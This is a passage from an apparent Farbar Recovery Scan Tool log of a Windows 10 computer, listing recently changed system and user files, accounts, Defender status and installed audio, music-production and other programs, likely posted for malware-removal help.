19:49 - 2019-04-19 11:38 - 000040960 _____ (Microsoft Corporation) C:\WINDOWS\system32\perfproc.dll 2019-05-14 19:49 - 2019-04-19 11:36 - 000346112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AcGenral.dll 2019-05-14 19:49 - 2019-04-19 11:34 - 000522240 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv 2019-05-14 19:49 - 2019-04-19 10:44 - 001454648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll 2019-05-14 19:49 - 2019-04-19 10:37 - 000607960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kernel32.dll 2019-05-14 19:49 - 2019-04-19 10:30 - 000036864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\perfproc.dll 2019-05-14 19:49 - 2019-04-19 10:28 - 011940864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll 2019-05-14 19:49 - 2019-04-19 10:26 - 002405888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AcGenral.dll 2019-05-14 19:49 - 2019-04-19 10:25 - 000423936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv 2019-05-14 19:49 - 2019-04-19 06:07 - 000985400 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe 2019-05-14 19:49 - 2019-04-19 06:06 - 002571632 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll 2019-05-14 19:49 - 2019-04-19 06:06 - 000798520 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupEngine.dll 2019-05-14 19:49 - 2019-04-19 06:06 - 000713264 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVideoDSP.dll 2019-05-14 19:49 - 2019-04-19 06:06 - 000436024 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll 2019-05-14 19:49 - 2019-04-19 06:06 - 000274232 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll 2019-05-14 19:49 - 2019-04-19 06:02 - 000831800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe 2019-05-14 19:49 - 2019-04-19 06:01 - 001982008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll 2019-05-14 19:49 - 2019-04-19 06:01 - 000581592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVideoDSP.dll 2019-05-14 19:49 - 2019-04-19 06:01 - 000576016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupEngine.dll 2019-05-14 19:49 - 2019-04-19 06:01 - 000380728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll 2019-05-14 19:49 - 2019-04-19 05:43 - 000150016 _____ (Microsoft Corporation) C:\WINDOWS\system32\fcon.dll 2019-05-14 19:49 - 2019-04-19 05:42 - 004384256 _____ (Microsoft Corporation) C:\WINDOWS\system32\EdgeContent.dll 2019-05-14 19:49 - 2019-04-19 05:41 - 000140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\mdmmigrator.dll 2019-05-14 19:49 - 2019-04-19 05:41 - 000095232 _____ (Microsoft Corporation) C:\WINDOWS\system32\EduPrintProv.exe 2019-05-14 19:49 - 2019-04-19 05:40 - 000342528 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserexport.exe 2019-05-14 19:49 - 2019-04-19 05:40 - 000243712 _____ (Microsoft Corporation) C:\WINDOWS\system32\JpnServiceDS.dll 2019-05-14 19:49 - 2019-04-19 05:40 - 000172544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\enrollmentapi.dll 2019-05-14 19:49 - 2019-04-19 05:40 - 000167936 _____ (Microsoft Corporation) C:\WINDOWS\system32\FilterDS.dll 2019-05-14 19:49 - 2019-04-19 05:40 - 000081408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetDriverInstall.dll 2019-05-14 19:49 - 2019-04-19 05:39 - 005307392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll 2019-05-14 19:49 - 2019-04-19 05:39 - 000567296 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll 2019-05-14 19:49 - 2019-04-19 05:39 - 000425472 _____ (Microsoft Corporation) C:\WINDOWS\system32\SDDS.dll 2019-05-14 19:49 - 2019-04-19 05:39 - 000374784 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingASDS.dll 2019-05-14 19:49 - 2019-04-19 05:39 - 000361472 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceEnroller.exe 2019-05-14 19:49 - 2019-04-19 05:39 - 000204288 _____ (Microsoft Corporation) C:\WINDOWS\system32\enrollmentapi.dll 2019-05-14 19:49 - 2019-04-19 05:38 - 002368512 _____ (Microsoft Corporation) C:\WINDOWS\system32\WebRuntimeManager.dll 2019-05-14 19:49 - 2019-04-19 05:38 - 000593408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Management.dll 2019-05-14 19:49 - 2019-04-19 05:38 - 000391680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll 2019-05-14 19:49 - 2019-04-19 05:38 - 000304128 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll 2019-05-14 19:49 - 2019-04-19 05:38 - 000300544 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmenterprisediagnostics.dll 2019-05-14 19:49 - 2019-04-19 05:38 - 000140800 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatepolicy.dll 2019-05-14 19:49 - 2019-04-19 05:37 - 000953856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll 2019-05-14 19:49 - 2019-04-19 05:37 - 000445952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dmenrollengine.dll 2019-05-14 19:49 - 2019-04-19 05:37 - 000397312 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvc.dll 2019-05-14 19:49 - 2019-04-19 05:37 - 000381952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\FirewallAPI.dll 2019-05-14 19:49 - 2019-04-19 05:37 - 000366080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll 2019-05-14 19:49 - 2019-04-19 05:37 - 000221184 _____ (Microsoft Corporation) C:\WINDOWS\system32\mdmregistration.dll 2019-05-14 19:49 - 2019-04-19 05:37 - 000118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\updatepolicy.dll 2019-05-14 19:49 - 2019-04-19 05:36 - 002909696 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll 2019-05-14 19:49 - 2019-04-19 05:36 - 001300992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll 2019-05-14 19:49 - 2019-04-19 05:36 - 000827392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Management.dll 2019-05-14 19:49 - 2019-04-19 05:36 - 000814592 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll 2019-05-14 19:49 - 2019-04-19 05:36 - 000546816 _____ (Microsoft Corporation) C:\WINDOWS\system32\FirewallAPI.dll 2019-05-14 19:49 - 2019-04-19 05:36 - 000357888 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapibase.dll 2019-05-14 19:49 - 2019-04-19 05:36 - 000186368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mdmregistration.dll 2019-05-14 19:49 - 2019-04-19 05:35 - 001938944 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll 2019-05-14 19:49 - 2019-04-19 05:35 - 001458688 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll 2019-05-14 19:49 - 2019-04-19 05:35 - 001175552 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll 2019-05-14 19:49 - 2019-04-19 05:35 - 001156608 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcss.dll 2019-05-14 19:49 - 2019-04-19 05:35 - 000784896 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngcsvc.dll 2019-05-14 19:49 - 2019-04-19 05:35 - 000607232 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll 2019-05-14 19:49 - 2019-04-19 05:35 - 000535040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneDriveSettingSyncProvider.dll 2019-05-14 19:49 - 2019-04-19 05:35 - 000523776 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmenrollengine.dll 2019-05-14 19:49 - 2019-04-19 05:35 - 000312320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fveapibase.dll 2019-05-14 19:49 - 2019-04-19 05:34 - 000935936 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll 2019-05-14 19:49 - 2019-04-19 05:34 - 000899584 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll 2019-05-14 19:49 - 2019-04-19 05:34 - 000885760 _____ (Microsoft Corporation) C:\WINDOWS\system32\MPSSVC.dll 2019-05-14 19:49 - 2019-04-19 05:34 - 000778240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll 2019-05-14 19:49 - 2019-04-19 05:34 - 000653312 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneDriveSettingSyncProvider.dll 2019-05-14 19:49 - 2019-04-19 04:18 - 000806360 _____ C:\WINDOWS\SysWOW64\locale.nls 2019-05-14 19:49 - 2019-04-19 04:18 - 000806360 _____ C:\WINDOWS\system32\locale.nls 2019-05-14 19:49 - 2019-04-09 02:48 - 001311744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjet40.dll 2019-05-14 19:49 - 2019-04-09 02:48 - 000376320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspbde40.dll 2019-05-14 19:49 - 2019-04-09 02:48 - 000353280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrd3x40.dll 2019-05-14 19:49 - 2019-04-09 02:48 - 000341504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msexcl40.dll 2019-05-14 19:49 - 2019-04-09 02:48 - 000240640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msltus40.dll 2019-05-11 07:40 - 2019-04-24 09:06 - 000205992 _____ (Lenovo Group Ltd.) C:\WINDOWS\system32\Lenovo.Modern.CoreTypes.dll 2019-05-11 07:40 - 2019-04-24 09:06 - 000130728 _____ (Lenovo Group Ltd.) C:\WINDOWS\system32\Lenovo.Modern.Utilities.dll 2019-05-11 07:40 - 2019-04-24 09:06 - 000097448 _____ (Lenovo Group Ltd.) C:\WINDOWS\system32\Lenovo.Modern.ImController.ImClient.dll 2019-05-11 07:40 - 2019-04-24 09:06 - 000043688 _____ (Lenovo Group Ltd.) C:\WINDOWS\system32\Lenovo.ImController.EventLogging.dll 2019-05-10 22:16 - 2019-05-10 22:16 - 000000000 ____D C:\Users\MYMLA\New folder 2019-05-10 22:15 - 2019-05-10 22:15 - 000001099 _____ C:\Users\MYMLA\Desktop\Magic MP3 Tagger.lnk 2019-05-10 22:15 - 2019-05-10 22:15 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Magic MP3 Tagger 2019-05-10 22:15 - 2019-05-10 22:15 - 000000000 ____D C:\Program Files (x86)\Magic MP3 Tagger 2019-05-10 22:14 - 2019-05-10 22:15 - 004645440 _____ (Mathias Kunter ) C:\Users\MYMLA\Downloads\magic_tagger_db_2011-05-16.exe 2019-05-10 22:14 - 2019-05-10 22:14 - 005579472 _____ (Mathias Kunter ) C:\Users\MYMLA\Downloads\magic_tagger.exe 2019-05-10 19:34 - 2019-05-10 19:34 - 000867243 _____ C:\Users\MYMLA\Downloads\mp3gain-win-1_2_5 (1).exe ==================== One month (modified) ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2019-06-09 19:49 - 2018-09-17 20:30 - 000000000 ____D C:\Program Files (x86)\Steam 2019-06-09 19:48 - 2018-04-12 00:38 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft 2019-06-09 19:47 - 2018-10-05 20:57 - 000000000 ____D C:\Program Files (x86)\TunnelBear 2019-06-09 19:47 - 2018-09-17 18:36 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT 2019-06-09 19:46 - 2018-04-11 22:04 - 000524288 _____ C:\WINDOWS\system32\config\BBI 2019-06-09 19:46 - 2017-08-09 23:08 - 000065536 _____ C:\WINDOWS\system32\spu_storage.bin 2019-06-09 19:46 - 2017-03-18 22:03 - 000000000 ____D C:\WINDOWS\system32\Tasks_Migrated 2019-06-09 19:38 - 2018-09-16 13:41 - 000000000 ____D C:\Users\MYMLA\AppData\Roaming\BitTorrent 2019-06-09 19:27 - 2018-04-12 00:38 - 000000000 ___HD C:\WINDOWS\ELAMBKUP 2019-06-09 18:54 - 2019-03-20 20:34 - 000000000 ____D C:\Users\MYMLA\AppData\Roaming\vlc 2019-06-09 18:52 - 2018-09-17 18:18 - 000000000 ____D C:\WINDOWS\system32\SleepStudy 2019-06-09 16:36 - 2018-12-31 12:27 - 000000000 ____D C:\Users\MYMLA\AppData\Roaming\Cabbage2 2019-06-09 16:19 - 2018-09-17 18:22 - 000000000 ____D C:\Users\MYMLA 2019-06-09 14:40 - 2018-09-19 14:12 - 000000000 ____D C:\Users\MYMLA\AppData\Local\D3DSCache 2019-06-09 14:25 - 2018-04-12 00:38 - 000000000 ___HD C:\Program Files\WindowsApps 2019-06-09 14:25 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\AppReadiness 2019-06-06 17:59 - 2018-09-16 13:35 - 000002308 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk 2019-06-06 17:59 - 2018-09-16 13:35 - 000002267 _____ C:\Users\Public\Desktop\Google Chrome.lnk 2019-06-05 20:38 - 2018-09-17 09:26 - 000000000 ____D C:\VST64 2019-06-04 22:45 - 2018-11-24 17:58 - 000000000 ____D C:\Users\MYMLA\AppData\Roaming\Sky Go 2019-06-04 19:02 - 2018-09-27 19:40 - 000000000 ____D C:\Users\MYMLA\AppData\Local\babl-0.1 2019-06-04 18:41 - 2018-10-19 10:19 - 000000000 ____D C:\Users\MYMLA\AppData\Local\gtk-2.0 2019-06-04 18:11 - 2018-12-31 12:27 - 000000856 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cabbage.lnk 2019-06-04 18:11 - 2018-12-31 12:26 - 000000000 ____D C:\Program Files\Cabbage 2019-06-02 10:17 - 2018-09-17 18:18 - 000413544 _____ C:\WINDOWS\system32\FNTCACHE.DAT 2019-06-01 17:45 - 2018-09-17 18:36 - 000003378 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-1007420050-912919110-3395148121-1001 2019-06-01 17:45 - 2018-09-17 18:22 - 000002370 _____ C:\Users\MYMLA\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk 2019-06-01 17:45 - 2017-10-25 11:25 - 000000000 ___RD C:\Users\MYMLA\OneDrive 2019-05-26 14:18 - 2018-09-17 09:58 - 000000000 ____D C:\Kontakt Instruments 2019-05-25 23:04 - 2018-09-28 15:18 - 000000000 ____D C:\Users\MYMLA\AppData\Roaming\audacity 2019-05-22 21:04 - 2018-09-28 13:03 - 000767996 _____ C:\WINDOWS\system32\perfh019.dat 2019-05-22 21:04 - 2018-09-28 13:03 - 000150740 _____ C:\WINDOWS\system32\perfc019.dat 2019-05-22 21:04 - 2018-09-17 18:32 - 001748432 _____ C:\WINDOWS\system32\PerfStringBackup.INI 2019-05-22 21:04 - 2018-04-12 00:36 - 000000000 ____D C:\WINDOWS\INF 2019-05-20 18:46 - 2018-04-12 00:30 - 000000000 ____D C:\WINDOWS\CbsTemp 2019-05-19 09:06 - 2019-02-04 19:11 - 2901032960 ____R C:\Users\MYMLA\Downloads\7z.iso 2019-05-18 22:49 - 2019-02-24 18:10 - 000000000 ____D C:\Users\MYMLA\AppData\Local\ElevatedDiagnostics 2019-05-18 11:15 - 2019-02-01 23:08 - 000000000 ____D C:\Users\MYMLA\AppData\Local\Spectrasonics 2019-05-18 11:13 - 2018-09-28 11:42 - 000000016 _____ C:\Users\MYMLA\AppData\Roaming\msregsvv.dll 2019-05-18 11:13 - 2018-09-28 11:42 - 000000016 _____ C:\ProgramData\autobk.inc 2019-05-18 11:08 - 2018-09-17 10:03 - 000000000 ____D C:\Users\MYMLA\AppData\Local\Native Instruments 2019-05-18 11:08 - 2018-09-17 10:02 - 000000000 ___RD C:\Users\MYMLA\Documents\Native Instruments 2019-05-18 10:35 - 2018-09-23 00:59 - 000000000 ____D C:\Program Files\VSTPlugIns 2019-05-18 10:35 - 2018-09-17 09:41 - 000000000 ___RD C:\Program Files\Native Instruments 2019-05-18 10:35 - 2018-09-17 09:41 - 000000000 ___RD C:\Program Files\Common Files\Native Instruments 2019-05-17 17:20 - 2018-09-14 10:52 - 000000000 ____D C:\Program Files\rempl 2019-05-16 22:08 - 2019-01-24 19:34 - 000001049 _____ C:\Users\MYMLA\Desktop\Sky Go.lnk 2019-05-16 22:08 - 2018-11-24 17:57 - 000000000 ____D C:\Users\MYMLA\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Sky 2019-05-15 19:52 - 2018-09-17 18:36 - 000003418 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA 2019-05-15 19:52 - 2018-09-17 18:36 - 000003294 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore 2019-05-14 21:00 - 2018-04-12 00:38 - 000000000 ___SD C:\WINDOWS\system32\DiagSvcs 2019-05-14 21:00 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\TextInput 2019-05-14 21:00 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\ShellExperiences 2019-05-14 21:00 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\bcastdvr 2019-05-14 19:48 - 2018-09-16 14:36 - 000000000 ____D C:\WINDOWS\system32\MRT 2019-05-14 19:46 - 2018-09-16 14:36 - 132445408 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe 2019-05-13 22:13 - 2019-02-19 22:35 - 000000000 ____D C:\Program Files (x86)\MP3Gain 2019-05-10 20:44 - 2019-05-09 20:55 - 000000000 ____D C:\Users\MYMLA\Downloads\시티팝 베스트 ==================== Files in the root of some directories ======= 2018-09-28 11:42 - 2019-05-18 11:13 - 000000016 _____ () C:\Users\MYMLA\AppData\Roaming\msregsvv.dll 2019-06-04 18:41 - 2019-06-04 18:41 - 000005933 _____ () C:\Users\MYMLA\AppData\Local\recently-used.xbel 2018-09-16 17:09 - 2018-09-16 17:09 - 000000017 _____ () C:\Users\MYMLA\AppData\Local\resmon.resmoncfg ==================== SigCheck =============================== (There is no automatic fix for files that do not pass verification.) ==================== End of FRST.txt ============================ Additional scan result of Farbar Recovery Scan Tool (x64) Version: 09-06-2019 01 Ran by MYMLA (09-06-2019 19:54:25) Running from C:\Users\MYMLA\Downloads Windows 10 Home Version 1803 17134.765 (X64) (2018-09-17 17:38:00) Boot Mode: Normal ========================================================== ==================== Accounts: ============================= Administrator (S-1-5-21-1007420050-912919110-3395148121-500 - Administrator - Disabled) DefaultAccount (S-1-5-21-1007420050-912919110-3395148121-503 - Limited - Disabled) Guest (S-1-5-21-1007420050-912919110-3395148121-501 - Limited - Disabled) MYMLA (S-1-5-21-1007420050-912919110-3395148121-1001 - Administrator - Enabled) => C:\Users\MYMLA WDAGUtilityAccount (S-1-5-21-1007420050-912919110-3395148121-504 - Limited - Disabled) ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Installed Programs ====================== (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) 7-Zip 18.05 (x64) (HKLM\...\7-Zip) (Version: 18.05 - Igor Pavlov) Altiverb 7 Uninstaller (HKLM\...\{367662CA-394A-4095-9549-973FC3807B9B}_is1) (Version: 7.2 - Audio Ease BV) AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 18.10.1 - Advanced Micro Devices, Inc.) AmpliTube 4 version 4.6.0 (HKLM\...\{21B0C8E0-7EB7-4832-B764-20A7DAE86E02}_is1) (Version: 4.6.0 - IK Multimedia) ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.14 - Michael Tippach) Audacity 2.2.2 (HKLM-x32\...\Audacity_is1) (Version: 2.2.2 - Audacity Team) Bitcoin Gold (64-bit) (HKU\S-1-5-21-1007420050-912919110-3395148121-1001\...\Bitcoin Gold (64-bit)) (Version: 0.15.2 - Bitcoin Gold project) BitTorrent (HKU\S-1-5-21-1007420050-912919110-3395148121-1001\...\BitTorrent) (Version: 7.10.5.44995 - BitTorrent Inc.) Branding64 (HKLM\...\{EE2AFCE4-0238-4DE0-A140-1647021627C1}) (Version: 1.00.0001 - Advanced Micro Devices, Inc.) Hidden Cabbage version 2 (HKLM-x32\...\{5504E7FB-F385-40B0-8D46-35E7A544A383}_is1) (Version: 2 - Cabbage Audio) calibre (HKLM-x32\...\{CF5F9723-E951-4080-BF78-7263A1C9C396}) (Version: 3.32.0 - Kovid Goyal) Catalyst Control Center Next Localization BR (HKLM\...\{8A29A8D7-8108-1A32-CA6D-1AC90FD36758}) (Version: 2017.0614.553.8771 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHS (HKLM\...\{30D72A5C-CE8A-9ADB-C247-1F14C0B68ABB}) (Version: 2017.0614.553.8771 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHT (HKLM\...\{A2414DE4-2B81-F09E-13AD-ED72EDB94806}) (Version: 2017.0614.553.8771 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CS (HKLM\...\{3E080882-58FD-E0FA-0ACD-467C5009C5D2}) (Version: 2017.0614.553.8771 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DA (HKLM\...\{5E5C8CBF-154D-684B-926A-F2B6D77207FA}) (Version: 2017.0614.553.8771 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DE (HKLM\...\{059A1C9E-0DB4-E241-781A-E4D330B512A6}) (Version: 2017.0614.553.8771 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization EL (HKLM\...\{1823E449-5FF6-6D42-1B1B-5C44422D88E7}) (Version: 2017.0614.553.8771 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization ES (HKLM\...\{9E258DFB-5906-FA6D-2577-9E93A167F009}) (Version: 2017.0614.553.8771 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FI (HKLM\...\{C2333BBF-DE53-3C2D-3CA6-CFCFCBFDD411}) (Version: 2017.0614.553.8771 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FR (HKLM\...\{0A17D72C-40CA-9F6E-8B18-2806CECE652C}) (Version: 2017.0614.553.8771 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization HU (HKLM\...\{8F8C42B4-4F51-2048-3584-4D56BBB568A9}) (Version: 2017.0614.553.8771 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization IT (HKLM\...\{6EE6CC89-6A57-A5D2-88B8-D1CEA2F3F250}) (Version: 2017.0614.553.8771 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization JA (HKLM\...\{59877761-A89C-BD58-B62A-CB87270CD6AE}) (Version: 2017.0614.553.8771 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization KO (HKLM\...\{7FCA37ED-838F-44F4-E00F-41BB67EC3516}) (Version: 2017.0614.553.8771 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NL (HKLM\...\{D03714D3-01E7-1316-8D7A-E5D45C48E4F6}) (Version: 2017.0614.553.8771 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NO (HKLM\...\{1CA6D559-004D-4787-0A4A-6D58E980E63B}) (Version: 2017.0614.553.8771 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization PL (HKLM\...\{BF56C410-2A09-FC97-5595-CC54BAFFCEE9}) (Version: 2017.0614.553.8771 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization RU (HKLM\...\{3B573C6D-77A4-9DBE-64D8-651605B9FF61}) (Version: 2017.0614.553.8771 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization SV (HKLM\...\{F38C99DD-A490-F4F9-CA04-8B4BA755249C}) (Version: 2017.0614.553.8771 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TH (HKLM\...\{ED49927C-C5C9-374D-5C25-CF03B7BA4CAB}) (Version: 2017.0614.553.8771 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TR (HKLM\...\{0835A3CB-C790-7AAE-E779-749504660DCD}) (Version: 2017.0614.553.8771 - Advanced Micro Devices, Inc.) Hidden CCSDK (HKLM-x32\...\{964ACF65-2550-4B28-8E45-606A618C64EE}) (Version: 3.0.0.16 - Lenovo) Cisco VideoGuard Player (HKLM-x32\...\{30e4813e-2a86-4e4f-82ea-23df71ca8ffb}) (Version: 10.1.1.6570 - Cisco Systems, Inc) Csound6_x64 version 6 (HKLM-x32\...\{180B4E5B-9A2F-4DA8-8692-97A174ACB74E}_is1) (Version: 6 - Csound) Custom Shop version 1.8.0 (HKLM-x32\...\{21BAD046-50EC-49E2-BE7B-F9729704F2C3}_is1) (Version: 1.8.0 - IK Multimedia) CyberLink PowerDVD 14 (HKLM-x32\...\{32C8E300-BDB4-4398-92C2-E9B7D8A233DB}) (Version: 14.0.1.7626 - CyberLink Corp.) FL Studio 20 (HKLM-x32\...\FL Studio 20) (Version: - Image-Line) FL Studio ASIO (HKLM-x32\...\FL Studio ASIO) (Version: - Image-Line) FlacSquisher 1.3.8 (HKLM-x32\...\FlacSquisher) (Version: 1.3.8 - FlacSquisher) Focusrite USB 4.36.5.0 (HKLM\...\Focusrite USB_is1) (Version: 4.36.5.0 - Focusrite Audio Engineering Ltd.) GIMP 2.10.6 (HKLM\...\GIMP-2_is1) (Version: 2.10.6 - The GIMP Team) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 75.0.3770.80 - Google LLC) Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.34.11 - Google LLC) Hidden Grand Theft Auto V (HKLM-x32\...\Grand Theft Auto V_is1) (Version: - ) IK Multimedia Authorization Manager version 1.0.20 (HKLM\...\{85BC0DCB-69E5-4279-AA25-F108EF896588}_is1) (Version: 1.0.20 - IK Multimedia) IL Download Manager (HKLM-x32\...\IL Download Manager) (Version: - Image-Line) Intel(R) C++ Redistributables on IA-32 (HKLM-x32\...\{317059CB-7642-4F2E-89C0-62E69D4074B7}) (Version: 15.0.148 - Intel Corporation) Intel(R) C++ Redistributables on Intel(R) 64 (HKLM-x32\...\{2DD3C090-2986-4970-B3CB-87BB4C8AC4A5}) (Version: 15.0.148 - Intel Corporation) Java 8 Update 211 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180211F0}) (Version: 8.0.2110.12 - Oracle Corporation) JetBrains PyCharm Community Edition 2019.1.1 (HKLM-x32\...\PyCharm Community Edition 2019.1.1) (Version: 191.6605.12 - JetBrains s.r.o.) LAME v3.99.3 (for Windows) (HKLM-x32\...\LAME_is1) (Version: - ) Lenovo Essential Wireless Keyboard (HKLM\...\Lenovo Essential Wireless Keyboard) (Version: 1.0 - Lenovo) Lenovo Family Cloud Server (HKLM\...\{7A0FD846-7176-4265-B7B9-5D3FFFC1FA6C}) (Version: 1.3.29.0527 - Lenovo) Hidden Lenovo Family Cloud Server (HKLM-x32\...\InstallShield_{7A0FD846-7176-4265-B7B9-5D3FFFC1FA6C}) (Version: 1.3.29.0527 - Lenovo) Lenovo Power2Go (HKLM-x32\...\{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.0.8231 - CyberLink Corp.) Hidden Lenovo Power2Go (HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.0.8231 - CyberLink Corp.) Magic MP3 Tagger 2.2.6 (HKLM-x32\...\uniquemagicmp3taggerappid_is1) (Version: - Mathias Kunter) Malwarebytes version 3.7.1.2839 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.7.1.2839 - Malwarebytes) Massive (HKLM\...\Massive_is1) (Version: 1.5.5 - Native Instruments & Team V.R) Max 8 (64-bit) (HKLM\...\{60329BCD-948A-4015-A1B8-73E72B69D6E1}) (Version: 8.0.1 - Cycling '74) Microsoft Office Professional Plus 2019 - en-us (HKLM\...\ProPlus2019Retail - en-us) (Version: 16.0.11425.20228 - Microsoft Corporation) Microsoft OneDrive (HKU\S-1-5-21-1007420050-912919110-3395148121-1001\...\OneDriveSetup.exe) (Version: 19.070.0410.0007 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6E8E85E8-CE4B-4FF5-91F7-04999C9FAE6A}) (Version: 8.0.50727.42 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 